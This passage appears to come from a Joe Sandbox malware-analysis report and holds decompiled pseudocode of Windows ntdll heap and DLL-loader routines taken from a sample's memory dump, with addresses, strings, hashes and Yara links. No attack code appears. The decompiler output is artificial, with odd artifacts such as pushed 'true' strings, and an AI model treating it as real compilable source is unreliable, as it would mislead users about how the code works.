					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push("true");
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E36B22BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E36BA5FED(0, _t300, "true", _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x36bd373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E36B22B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E36B9EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E36B9D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t278 = _t298 + 8;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E36BA5FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E36AF096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E36BA5FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E36AF3C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E36B9F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E36AF3C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E36B9F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E36AF036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E36BA5FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E36BA5FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x36bd432c; // 0x0
						_v24 = 0x36bd432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x36af0689
0x36af068d
0x36af0690
0x36af0699
0x36af06a3
0x36af0929
0x00000000
0x36af0929
0x36af06b0
0x36b44e97
0x36b44e99
0x36b44e9f
0x36b44ea5
0x36b44ea9
0x36b44eca
0x36b44ecf
0x36b44eab
0x36b44ec0
0x36b44ec5
0x36b44ed7
0x36b44edc
0x36b44ee4
0x36b44eeb
0x36b44ef6
0x36b44ef6
0x36b44eeb
0x36b44e99
0x36af06b6
0x36af06b9
0x36af06b9
0x36af06be
0x36af0921
0x36af06c4
0x36af06c4
0x36af06c4
0x36af06ca
0x36af06d3
0x36af06d9
0x36af06dc
0x36b44f0a
0x36b44f10
0x36b44f13
0x00000000
0x36af06e2
0x36af06e2
0x36af06f2
0x36af0930
0x36af0936
0x36af0938
0x36af093e
0x36af093e
0x36af0938
0x36af06ff
0x36b44f1b
0x36b44f1d
0x36b44f22
0x36b44f29
0x36b44f2a
0x36b44f2c
0x36b44f2d
0x36b44f2f
0x36b44f34
0x36b44f36
0x36b44f39
0x36b44f44
0x36b44f4d
0x36b44f4f
0x36b44f54
0x36b44f5b
0x36b44f5b
0x00000000
0x36b44f5b
0x36b44f3b
0x36b44f3d
0x00000000
0x00000000
0x36b44f3f
0x36b44f42
0x00000000
0x00000000
0x00000000
0x36af0705
0x36af0705
0x36af070c
0x36af070e
0x36af0724
0x36af0727
0x36af072d
0x36af0730
0x36af0751
0x36af0751
0x36af0757
0x36af075c
0x36af075d
0x36af075f
0x36af0760
0x36af0762
0x36af0767
0x36af076a
0x36af076a
0x36af0770
0x36af0772
0x36b44f9f
0x00000000
0x36b44f9f
0x36af077e
0x36af0783
0x36b44faa
0x36b44fad
0x00000000
0x00000000
0x36b44fbc
0x36af078e
0x36af0791
0x36b44fcc
0x36b44fd3
0x36b44fe2
0x36b44fe2
0x36b44fd3
0x36af079b
0x36af07a0
0x36af07a4
0x36af07b0
0x36af07b7
0x36b44fec
0x36b44ff1
0x36b44ff1
0x36af07b7
0x36af07bd
0x36af07c1
0x36af07c5
0x36af07c8
0x36af07cb
0x36af07d0
0x36af07d3
0x36af07d6
0x36b45008
0x36af07e4
0x36af07e4
0x36af07e6
0x36af07e6
0x36af07e9
0x36af07ee
0x36af081b
0x36af081b
0x36af081e
0x36af0827
0x36af082d
0x36af0833
0x36af0839
0x36af083f
0x36af0848
0x36af08fd
0x36af0903
0x36af0903
0x36af084e
0x36af0851
0x36af0855
0x36af0945
0x36af094d
0x36af0950
0x36af0953
0x36af0964
0x00000000
0x36af0964
0x36af0955
0x00000000
0x36af085b
0x36af085b
0x36af086e
0x36af0876
0x36af0879
0x36af0879
0x36af087c
0x36af0880
0x36af0885
0x36af08dd
0x36af08de
0x36af08e1
0x36af08e6
0x36af08f3
0x36af08f8
0x36af08f8
0x36af0887
0x36af0887
0x36af0887
0x36af0889
0x36af0892
0x36af0897
0x36b4505d
0x36b45060
0x00000000
0x00000000
0x36b4506f
0x36af08a2
0x36af08a5
0x36b45079
0x36b4507f
0x36b45086
0x00000000
0x00000000
0x36b45091
0x36b45093
0x36b450a5
0x36b45095
0x36b4509e
0x36b4509e
0x36b450af
0x36b450be
0x36af08ae
0x36af08b4
0x36af08b9
0x36b450c8
0x36b450cb
0x00000000
0x00000000
0x36b450da
0x36af08c4
0x36af08c7
0x36b450e9
0x36b450eb
0x36b450fd
0x36b450ed
0x36b450f6
0x36b450f6
0x36b45113
0x36b45113
0x00000000
0x36af08cd
0x36af08bf
0x36af08bf
0x00000000
0x36af08bf
0x36af08ab
0x36af08ab
0x00000000
0x36af08ab
0x36af089d
0x36af089d
0x00000000
0x36af089d
0x36af07f0
0x36af07f0
0x36af07f8
0x36b45014
0x36b45017
0x36b4501a
0x36b45036
0x36b4503d
0x00000000
0x00000000
0x00000000
0x00000000
0x36b4501c
0x36b4501c
0x36b4501c
0x36b4501e
0x36b45020
0x36b45023
0x36b45026
0x00000000
0x00000000
0x36b45028
0x36b4502b
0x36b4502e
0x00000000
0x00000000
0x00000000
0x36b45030
0x36b45035
0x36b45035
0x00000000
0x36b45035
0x36af07fe
0x36af07fe
0x36af0801
0x36af0803
0x36af0808
0x36b45053
0x36af0816
0x36af0816
0x36af0818
0x36af0818
0x00000000
0x36af0808
0x36af07ee
0x36af0789
0x36af0789
0x00000000
0x36af0789
0x36af0732
0x36af0736
0x36b44f63
0x36b44f66
0x36b44f66
0x36b44f6b
0x36b44f6d
0x00000000
0x00000000
0x36b44f76
0x36b44f79
0x36b44f7b
0x36b44f8d
0x36b44f92
0x36b44f92
0x36b44f95
0x00000000
0x36b44f95
0x36af073c
0x36af0742
0x36af074b
0x00000000
0x00000000
0x00000000
0x36af074b
0x36af06ff

Strings

HEAP[%wZ]: , xrefs: 36B44EBB
HEAP: , xrefs: 36B44ECA
(UCRBlock->Size >= *Size), xrefs: 36B44ED7

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: d6f918b5e7bbd06633bf9861679f211ede6708e94ac58dbddf75516632ac06b1
Instruction ID: 325faa6024f539b742d974855fc99f4431ecefa8133fa419f6941818ef8ae207
Opcode Fuzzy Hash: d6f918b5e7bbd06633bf9861679f211ede6708e94ac58dbddf75516632ac06b1
Instruction Fuzzy Hash: 14F1AA75A10615DFEB05CF68CCA0B6AB7B5FB44344F2081A8E8059F381DB35E981DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 36B09723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179
timeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E36B09723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E36B0A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x36bd65f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x36bd9214; // 0x0
						_push("true");
						_pop(_t88);
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E36AEFED0(0x36bd32d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x774636a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E36B00C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x36bd91e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E36AE98DE(_t87, "true");
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E36B685AA(_t87);
							}
						}
						__eflags =  *0x36bd37c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E36B5E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						L36B0A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x36bd32d8);
					_t50 = E36AEE740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L36AF2330(_t50, 0x36bd6668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t100 = _t104 + 8;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E36AFD963(_t86, _t86, 0, _t104, _t110, __eflags);
								E36AF24D0(0x36bd6668);
								__eflags = _v12;
								if(_v12 != 0) {
									E36B09723(_t86, 0);
								}
								_t50 = E36AF3BC0( *0x36bd5d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E36B09938(L36AF2330(_t50, 0x36bd6668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L36B09B40(_t85, _t107, _t110, 0x36bd67ac);
							_t29 = _t107 + 0x68; // -68
							L36B09B40(_t85, _t107, _t110, 0x36bd67a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E36AF24D0(0x36bd6668);
						if( *0x36bd5d70 != 0) {
							E36B1680F(_t107);
						}
						_t50 = E36AFD3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}

0x36b09723
0x36b0972b
0x36b09736
0x36b09738
0x36b0973c
0x36b0973e
0x36b09742
0x36b09747
0x36b097bc
0x36b097bc
0x36b097bc
0x36b097bc
0x36b097c0
0x36b097c5
0x36b097c5
0x36b097cb
0x36b09900
0x36b09908
0x36b09911
0x36b09913
0x36b09914
0x36b09916
0x36b09918
0x36b09918
0x36b097d6
0x36b097db
0x36b097dd
0x36b097dd
0x36b097e1
0x36b097e3
0x00000000
0x00000000
0x36b097e5
0x36b097e5
0x36b097e8
0x36b097ec
0x36b097ee
0x36b097f1
0x36b097f4
0x36b097f9
0x36b097fb
0x36b09922
0x36b09928
0x36b09928
0x36b09803
0x36b09805
0x36b0980a
0x36b0980e
0x36b09815
0x36b4dade
0x36b4dae0
0x36b4dae0
0x36b09815
0x36b0981b
0x36b09822
0x36b4daea
0x36b4db04
0x36b4db09
0x36b4db09
0x36b09828
0x36b0982a
0x36b0982d
0x36b09836
0x36b09836
0x36b0983a
0x36b0983f
0x36b09755
0x36b09755
0x36b09755
0x36b0975a
0x00000000
0x00000000
0x36b0986e
0x36b09870
0x36b09872
0x36b0992f
0x36b09931
0x36b09878
0x36b09878
0x36b09878
0x36b09878
0x36b09878
0x36b0987c
0x36b0987e
0x00000000
0x36b09884
0x36b09889
0x36b0988e
0x36b09891
0x36b09894
0x36b09897
0x36b09899
0x36b0989d
0x36b0989f
0x36b098b1
0x36b098b3
0x36b098b5
0x36b098b8
0x36b098c0
0x36b098c2
0x36b098c2
0x36b098c4
0x36b098c4
0x36b098cd
0x36b098d0
0x36b098da
0x36b098df
0x36b098e4
0x36b098e8
0x36b098e8
0x36b098f6
0x00000000
0x36b098f6
0x36b098a1
0x36b098a3
0x36b098a3
0x36b098a5
0x36b098a7
0x36b098a9
0x36b098a9
0x36b098ad
0x00000000
0x36b098ad
0x36b0987e
0x36b09760
0x36b09762
0x36b0976b
0x36b097b5
0x36b097bb
0x00000000
0x00000000
0x00000000
0x36b0976d
0x36b0976d
0x36b0976d
0x36b0976f
0x36b09777
0x36b09782
0x36b0978b
0x36b09849
0x36b09852
0x36b09857
0x36b09860
0x36b09865
0x36b09865
0x36b09796
0x36b097a2
0x36b4db13
0x36b4db13
0x36b097aa
0x36b097af
0x36b097b1
0x00000000
0x36b0976d
0x36b0974d
0x00000000
0x00000000
0x36b09753
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B09922

Strings

LdrpUnloadNode, xrefs: 36B4DAF5
minkernel\ntdll\ldrsnap.c, xrefs: 36B4DAFF
Unmapping DLL "%wZ", xrefs: 36B4DAEE

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 72cd934d08ac5f3144c800cc5b05ff9b0f080764c8a4dcb96644511a396ad34f
Instruction ID: 63a057aa79d7955acfac8829befae6d8885d4041852faed2cc21ac3dd80828be
Opcode Fuzzy Hash: 72cd934d08ac5f3144c800cc5b05ff9b0f080764c8a4dcb96644511a396ad34f
Instruction Fuzzy Hash: 5151FD76A04311ABE710FF38CC80A1ABFA1FB84354F14266DE9519B291EB34E805CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36B1C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E36B1C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E36B00130();
				if(_t25 != 0) {
					L36AF2330(_t25, 0x36bd5b5c);
					_t27 =  *0x36bd9224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E36AD9050( *0x36bd921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E36AF24D0(0x36bd5b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x36bdb370 ^ _t87;
							_t76 = _t65;
							 *0x36bd91e0( &_v544, "true", _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x36bd660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E36B6CB20(0x36bd5b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x36bd6608 & 0x0000ffff) + 2 + _t67;
									_t42 = E36AF5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E36B010D0(_t67,  &_v572, 0x36bd6608);
										E36B010D0(_t67,  &_v580,  &_v572);
										E36AEFE40(_t67,  &_v588, ";");
										E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x36bd660c);
										 *0x36bd6608 = _v608;
										_t54 = _v604;
										 *0x36bd660c = _t54;
										 *0x36bd6604 = _t54;
										E36B6D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x36bd37c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E36B5E692();
											_t56 =  *0x36bd37c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E36B24B50(_t39, 0x36bd5b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x36bd9224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E36AD9050( *0x36bd921c, "true");
								}
							}
							_t25 = E36AF24D0(0x36bd5b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x36b1c640
0x36b1c642
0x36b1c644
0x36b1c645
0x36b1c647
0x36b1c64e
0x36b1c65a
0x36b1c65f
0x36b1c664
0x36b1c666
0x36b1c668
0x36b1c6a4
0x36b1c6a6
0x00000000
0x36b1c6a8
0x36b1c6a8
0x00000000
0x36b1c6a8
0x36b1c66a
0x36b1c66a
0x36b1c66c
0x36b1c675
0x36b1c675
0x36b1c67a
0x36b1c67d
0x36b1c6ab
0x36b1c6ac
0x36b1c6b3
0x36b1c6b4
0x36b1c6be
0x36b1c6cb
0x36b1c6dc
0x36b1c6df
0x36b1c6e9
0x36b1c6e9
0x36b1c6eb
0x36b58090
0x36b5809b
0x36b580a4
0x36b580a9
0x36b580ae
0x36b5817f
0x36b58183
0x36b58188
0x36b58189
0x00000000
0x36b580b4
0x36b580c4
0x36b580cc
0x36b580d1
0x36b580d5
0x36b580d7
0x36b58114
0x36b58116
0x36b5811b
0x36b5812a
0x36b58139
0x36b58148
0x36b5815e
0x36b58167
0x36b5816c
0x36b58170
0x36b58175
0x36b5817a
0x00000000
0x36b580d9
0x36b580d9
0x36b580de
0x36b580e0
0x36b580e2
0x36b580e7
0x36b580e9
0x36b580ee
0x36b580f3
0x36b580f8
0x36b580fd
0x36b58102
0x36b58102
0x36b58105
0x36b58107
0x36b58109
0x36b58109
0x36b5810a
0x36b5810a
0x36b580d7
0x36b1c6f1
0x36b1c6f1
0x36b1c6f1
0x36b1c6f1
0x36b1c6f1
0x36b1c6fa
0x36b1c6fb
0x36b1c705
0x36b1c67f
0x36b1c67f
0x36b1c67f
0x36b1c680
0x36b1c680
0x36b1c685
0x36b1c687
0x36b1c689
0x36b1c68b
0x36b1c68d
0x36b1c697
0x36b1c697
0x36b1c68d
0x36b1c69d
0x00000000
0x36b1c69d
0x36b1c67d
0x36b1c650
0x36b1c650
0x36b1c653
0x36b1c653

APIs

RtlDebugPrintTimes.NTDLL ref: 36B1C6DF

Strings

Failed to reallocate the system dirs string !, xrefs: 36B580E2
LdrpInitializePerUserWindowsDirectory, xrefs: 36B580E9
minkernel\ntdll\ldrinit.c, xrefs: 36B580F3

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
